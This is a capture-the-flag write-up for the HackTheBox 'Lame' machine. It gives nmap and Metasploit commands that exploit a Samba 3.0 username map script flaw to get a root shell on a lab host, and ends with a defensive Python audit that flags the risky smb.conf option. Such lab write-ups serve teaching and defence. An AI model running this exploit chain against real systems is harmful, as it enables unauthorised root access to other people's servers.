Hackthebox – Lame Writeup

18 Jan, 2022

Today we are gonna solve the Lame machine from HackTheBox. Lame is a Linux machine released on 14 March 2017 and rated as an easy machine. We exploit a vulnerability in the Samba service on the SMB port to gain direct root access. Let’s get started.

Connecting to HTB VPN:

1. First download the VPN file from the access page of hackthebox.eu

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Once the “Initialization Completed” message appears on the screen, you are connected to the HackTheBox network

Scanning:

1. Let’s begin by performing an nmap scan of our target at 10.10.10.3

nmap -sV -A -p- --script vuln 10.10.10.3

-sV : to get the service versions on each port

-A : to enable OS detection, version detection, script scanning and traceroute

-p- : to scan all 65535 ports

--script vuln : to run the scripts in nmap's vuln category, which check for the most common vulnerabilities

We get the following details from our scan

Enumeration:

1. From the nmap result, there is an open SMB port running Samba smbd 3.x

2. But we don’t know the exact version of the service. Metasploit has an auxiliary module to find out SMB versions, so let’s use that

msfconsole

3. Search for smb_version

search smb_version

4. Select the auxiliary module

use auxiliary/scanner/smb/smb_version

5. View the options needed to be set using the show options command

show options

6. We have to set rhosts to the remote machine’s IP

set rhosts 10.10.10.3

7. And now we run the module (for an auxiliary module, exploit is an alias for run)

exploit

8. From the results we learn that the SMB port is running Samba 3.0

9. So let’s search Google for exploits against Samba 3.0. After some searching we find that there is a Metasploit module called usermap_script which can be used to exploit Samba 3.0.

Gaining access:

1. Search for usermap_script

search usermap_script

2. Select our exploit from the list by specifying the path

use exploit/multi/samba/usermap_script

3. View the options needed to be set using the show options command

show options

4. We have to set the rhosts to the remote machine address

set rhosts 10.10.10.3

5. Now let’s exploit the machine

exploit

6. Ta da, we got a meterpreter shell

7. Let’s check who we are on the system

whoami

We are root !!!!
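The usermap_script module used above works against Samba servers whose smb.conf sets the "username map script" option. The following audit is an added example, not part of the original writeup: it parses an smb.conf the way Samba reads parameter names (case and whitespace ignored) and flags that option together with a 3.0 version banner. The sample config, the banner strings and the function names are constructed for illustration.

```python
import re

# Constructed sample config for illustration (not taken from the target).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map = /etc/samba/smbusers
   User Name Map  Script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
"""

def _norm(name):
    # smb.conf ignores case and all whitespace in section/parameter names,
    # so a literal grep for "username map script" can miss the setting.
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    # Returns {section: {param: value}}; handles '#'/';' comments and
    # trailing-backslash line continuations.
    sections, current, pending = {}, None, ""
    for raw in text.splitlines():
        stripped = raw.strip()
        if not pending and (not stripped or stripped[0] in "#;"):
            continue
        line = pending + stripped
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(_norm(line[1:-1]), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current[_norm(key)] = value.strip()
    return sections

def audit(conf_text, banner):
    findings = []
    script = parse_smb_conf(conf_text).get("global", {}).get("usernamemapscript")
    if script:
        findings.append(f"username map script = {script}: usernames sent by "
                        "clients are handed to an external command")
    m = re.search(r"samba\D*(\d+)\.(\d+)", banner, re.I)
    if m and m.groups() == ("3", "0"):
        findings.append("banner reports Samba 3.0, the release line targeted "
                        "by usermap_script; upgrade to a supported release")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SMB_CONF, "Samba 3.0"):
        print("[!]", finding)
```

The option is not set by default, so if no username mapping is needed, remove it from [global] and restart smbd.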
